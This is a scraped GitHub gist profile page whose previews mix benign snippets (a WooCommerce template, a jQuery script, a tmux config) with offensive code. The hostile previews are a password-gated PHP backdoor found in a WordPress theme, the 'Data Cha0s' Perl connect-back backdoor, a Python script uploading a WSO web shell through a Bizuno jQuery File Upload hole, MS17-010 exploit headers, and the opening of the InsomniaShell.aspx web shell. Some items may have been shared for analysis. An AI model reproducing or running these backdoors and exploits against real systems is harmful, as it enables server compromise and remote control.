Skip to content

Instantly share code, notes, and snippets.

View islanddog's full-sized avatar
💭
Wisdom is not a product of schooling but of the lifelong attempt to acquire it.

Christopher Soehnlein islanddog

💭
Wisdom is not a product of schooling but of the lifelong attempt to acquire it.
View GitHub Profile
@islanddog
islanddog / add-to-cart.php
Last active August 22, 2016 20:35 — forked from claudiosanches/add-to-cart.php
WooCommerce 2.6.4 - Working Quantity on Simple Products - HOT
<?php
/**
* Custom Loop Add to Cart.
*
* Template with quantity and ajax.
*/
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly.
global $product;
@islanddog
islanddog / hsd.js
Created October 18, 2016 13:47
SproutApps - HelpScout Desk
jQuery.noConflict();
jQuery(function($) {
$(window).load(function(){
});
$(document).ready(function($){
var $shortcode_html = $("#hsd_conversations_table");
@islanddog
islanddog / HTTP500error.PHP
Created January 6, 2017 16:47
Embeddded above my Functions.PHP in my Theme Directory
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b6ea9d6122a7b904c78705dfb28cde40'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
@islanddog
islanddog / dc.pl
Created February 24, 2017 15:53
dc.pl - Backdoor Exploit
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
@islanddog
islanddog / linkk.php
Created February 24, 2017 16:04
linkk.php - Sindbad~EG File Manager - Virus
linkk.php
@islanddog
islanddog / jquery-file-upload.py
Created May 18, 2020 19:03
Bizuno Library 3.1.7 - JQuery File Upload Script
#!/usr/bin/python
import requests
# Host IP http://IP
host='Put IP HERE'
# JQuery path for Bizuno Library 3.1.7
url=host+'/Books/apps/jquery-file-upload/server/php/index.php'
# Uploading the shell to the server. I use wso-4.2.5.php in this example:
files = {'files': open('wso-4.2.5.php', 'rb')}
r = requests.post(url, files=files)
# Location of Shell/Name - wso.php
@islanddog
islanddog / .tmux.conf
Last active May 25, 2020 15:54 — forked from terrywang/.tmux.conf
~/.tmux.conf
# Remap prefix to A
set -g prefix C-a
bind C-a send-prefix
unbind C-b
# Reload the file with Prefix r
bind r source-file ~/.tmux.conf \; display "Reloaded!"
# Quality of life stuff
set -g history-limit 10000
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
from mysmb import MYSMB
from impacket import smb, smbconnection, nt_errors
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5.rpcrt import DCERPCException
from struct import pack
import sys
'''
Script for
- check target if MS17-010 is patched or not.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Security.Principal" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
//--------------------------------------------------------
// INSOMNIA SECURITY :: InsomniaShell.aspx